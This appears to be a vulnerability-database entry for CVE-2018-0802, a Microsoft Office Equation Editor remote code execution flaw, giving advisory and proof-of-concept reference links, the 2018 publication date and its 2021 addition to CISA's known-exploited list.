http://www.securityfocus.com/bid/102347http://www.securitytracker.com/id/1040153https://0patch.blogspot.com/2018/01/the-bug-that-killed-equation-editor-how.htmlhttps://github.com/rxwx/CVE-2018-0802https://github.com/zldww2011/CVE-2018-0802_POChttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802https://research.checkpoint.com/another-office-equation-rce-vulnerability/http://www.securityfocus.com/bid/102347http://www.securitytracker.com/id/1040153https://0patch.blogspot.com/2018/01/the-bug-that-killed-equation-editor-how.htmlhttps://github.com/rxwx/CVE-2018-0802https://github.com/zldww2011/CVE-2018-0802_POChttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802https://research.checkpoint.com/another-office-equation-rce-vulnerability/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-0802
2018-01-10
Published
2021-11-03
Added to CISA KEV
Exploited in the wild